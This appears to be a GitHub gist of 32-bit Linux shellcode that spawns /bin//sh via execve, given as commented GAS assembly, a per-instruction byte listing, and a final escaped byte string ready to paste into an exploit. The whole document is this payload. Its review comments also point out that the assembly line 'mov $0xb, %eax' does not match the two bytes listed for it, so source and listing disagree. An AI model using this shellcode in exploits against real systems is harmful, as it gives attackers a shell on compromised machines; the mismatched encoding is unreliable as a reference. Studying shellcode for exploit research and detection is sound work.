
@retpolanne
Last active January 4, 2019 00:33
Xors to remove null bytes
.global _start
.section .text
# Linux/i386 execve("/bin//sh", NULL, NULL) through the int 0x80 interface.
# GAS, AT&T syntax, 32-bit. Register roles at the trap: eax = 11 (execve),
# ebx = path, ecx = argv, edx = envp. Registers are cleared with xor and the
# path is built on the stack from two 4-byte immediates, so the encodings
# shown in the author's byte listing carry no zero byte - except the mov
# noted below.
# Detection note: the pushed immediates are the ASCII bytes "/bin" and "//sh",
# and together with eax = 0xb / int 0x80 they are the pattern signature-based
# detection commonly keys on for this sequence.
_start:
# execve syscall
xor %eax, %eax # eax = 0 (31 c0; avoids a mov with a zero-filled immediate)
push %eax # null byte for /bin/sh string - four zero bytes terminate the path
push $0x68732f2f # little endian //sh  ('/' '/' 's' 'h' in memory order)
push $0x6e69622f # little endian /bin  ('/' 'b' 'i' 'n'); two pushes = 8-byte path
mov %esp, %ebx # ptr to /bin//sh string - on the stack (arg 1: filename)
xor %ecx, %ecx # null ptr to argv (arg 2)
xor %edx, %edx # null ptr to envp (arg 3)
mov $0xb, %eax # syscall 11 - execve
# NOTE(review): with a 32-bit destination this assembles to a 5-byte form whose
# 4-byte immediate contains zero bytes, which contradicts the title and the
# 2-byte "0xb0 0x0b" the author's annotated listing shows for this line; the
# source line and the listing describe different encodings - reconcile them.
int $0x80 # kernel mode - trap into the kernel; on success execve does not return
@retpolanne

# Byte-level annotation of the same sequence: one line per instruction, opcode
# bytes as the author reports them (compare with the hex string below).
# NOTE(review): the bytes given for the mov line (0xb0 0x0b) are a 2-byte
# encoding, but `mov $0xb, %eax` as written assembles to a 5-byte form with a
# zero-filled immediate - one of the two is out of date.
xor %eax, %eax                # 0x31 0xc0
push %eax                        # 0x50
push $0x68732f2f           # 0x68 0x2f 0x2f 0x73 0x68 
push $0x6e69622f          # 0x68 0x2f 0x62 0x69 0x6e
mov %esp, %ebx              # 0x89 0xe3
xor %ecx, %ecx                # 0x31 0xc9
xor %edx, %edx               # 0x31 0xd2 
mov $0xb, %eax              # 0xb0 0x0b   
int $0x80                         # 0xcd 0x80

@retpolanne

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80
